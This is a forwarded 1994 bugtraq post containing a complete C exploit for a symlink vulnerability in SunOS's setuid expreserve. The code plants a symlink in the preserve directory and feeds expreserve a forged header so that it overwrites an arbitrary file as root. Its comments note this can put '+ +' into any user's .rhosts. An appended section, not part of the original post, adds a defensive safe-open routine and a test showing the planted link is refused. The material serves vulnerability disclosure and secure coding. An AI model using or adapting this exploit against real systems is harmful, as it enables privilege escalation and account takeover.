
Earlier mail from the bugtraq mailing list... forwarded.

wchuang@ATHENA.MIT.EDU (wchuang@ATHENA.MIT.EDU)
Tue Oct 18 18:39:25 1994

Message-Id: <94Oct2.081815hst.184397@uhunix.uhcc.Hawaii.Edu>
From: Tim Newsham <newsham@uhunix.uhcc.hawaii.edu>
To: bugtraq@crimelab.com
Date:   Sun, 2 Oct 1994 08:18:10 -1000
Sender: bugtraq-owner@crimelab.com

/*
 *  Exploit a security hole in expreserve on sun4.1.3
 *    <program> filename
 *       overwrites filename as root with garbage, chowns it to you
 *       (note, a 4.1.1 test overwrote with no chown;
 *        the first 4 characters written are "+ +\n",
 *        which can be used to overwrite anyone's .rhosts as root)
 *
 *                Tim N.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <time.h>
#include <pwd.h>
#include <fcntl.h>

#define HBLKS 2
#define FNSIZE 128
#define BLKS   900

/* the header expreserve expects at the start of a preserved buffer file */
typedef struct {
  time_t time;
  int uid;
  int flines;
  char name[FNSIZE];
  short Blocks[BLKS];
  short encrypted;
} header;

int main(int argc, char **argv)
{
  int p;
  header H;
  struct passwd *pw;
  char buf[100], *dest;

  if(argc!=2) {
    printf("usage: %s destination\n",argv[0]);
    exit(1);
  }
  dest = argv[1];
  p = getpid();
  pw = getpwuid(getuid());
  /* expreserve writes its output file under /var/preserve/<user>/;
     a symlink planted there makes it write to dest instead */
  sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
  symlink(dest,buf);
  /* expreserve reads the buffer from stdin, so reuse fd 0 for the temp file */
  close(0);
  if(open("./Ex",O_RDWR|O_CREAT,0666)<0)  {
    printf("Can't open Ex (temp file)\n");
    exit(2);
  }
/* fill out header so that expreserve thinks it's legit */
  H.time = 12345;    /* who cares */
  strcpy((char *)&H.time,"+ +\n");    /* it's a long, we got some free bytes in there */
  strcpy(H.name,"NoName");
  H.flines = 0;
  H.uid = getuid();
  H.Blocks[0] = HBLKS;
  H.Blocks[1] = HBLKS+1;
  write(0,&H,sizeof(H));
  lseek(0,0,SEEK_SET);
  printf("Made temp file 'Ex'.  You can remove it when done.\n");
  execl("/usr/lib/expreserve","expreserve",(char *)0);
  printf("Couldn't exec!\n");
  return 1;
}
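The hole above is a classic one: a setuid-root program creates its output under a directory the user controls (/var/preserve/<user>/Exaaa<pid>) and follows whatever symlink has been planted there. As an added defensive example, not part of Tim Newsham's post nor of Sun's expreserve source, the opener below shows the check such a program should make: reject symlinks and pre-existing entries with lstat() plus O_EXCL|O_NOFOLLOW, then confirm the descriptor really is a fresh regular file. The function names, the scratch directory and the victim path are assumptions of this example.

```c
#define _GNU_SOURCE 1
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

static int fail(int err) { errno = err; return -1; }
/* Open dir/name the way a setuid spool program should: refuse a planted symlink
 * (ELOOP) or any existing entry (EEXIST), then confirm the descriptor is a fresh
 * regular file. Returns the fd, or -1 with errno set. */
int safe_preserve_open(const char *dir, const char *name)
{
    char path[PATH_MAX];
    struct stat st;
    int fd;
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return fail(ENAMETOOLONG);
    if (lstat(path, &st) == 0)          /* lstat() does not follow links */
        return fail(S_ISLNK(st.st_mode) ? ELOOP : EEXIST);
    /* O_EXCL fails on anything (even a dangling symlink) planted after the
     * lstat(); O_NOFOLLOW makes the kernel itself refuse a symlink here. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd >= 0 && (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode))) { close(fd); return fail(EBADF); }
    return fd;
}

/* Constructed scenario mirroring the exploit above, in a scratch directory: the
 * planted symlink named like expreserve's spool file points at a victim path.
 * Returns 1 iff it is refused, no victim file appears, and a clean name opens. */
int demo_symlink_refused(void)
{
    char tmp[] = "/tmp/preserveXXXXXX", local[] = "preserveXXXXXX";
    char *dir = mkdtemp(tmp) ? tmp : mkdtemp(local);
    char victim[PATH_MAX], link[PATH_MAX], fresh[PATH_MAX];
    int fd, refused, created;
    if (dir == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim_rhosts", dir);
    snprintf(link, sizeof link, "%s/Exaaa00001", dir);
    snprintf(fresh, sizeof fresh, "%s/Exaaa00002", dir);
    if (symlink(victim, link) < 0) return 0;
    fd = safe_preserve_open(dir, "Exaaa00001");     /* planted link */
    refused = (fd < 0 && errno == ELOOP && access(victim, F_OK) != 0);
    fd = safe_preserve_open(dir, "Exaaa00002");     /* clean name */
    if ((created = fd >= 0)) close(fd);
    unlink(link); unlink(victim); unlink(fresh); rmdir(dir);
    return refused && created;
}
```

A plain open(..., O_CREAT) without O_EXCL would follow the dangling link and create the victim file as whoever runs the program, which is exactly what the exploit relies on.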
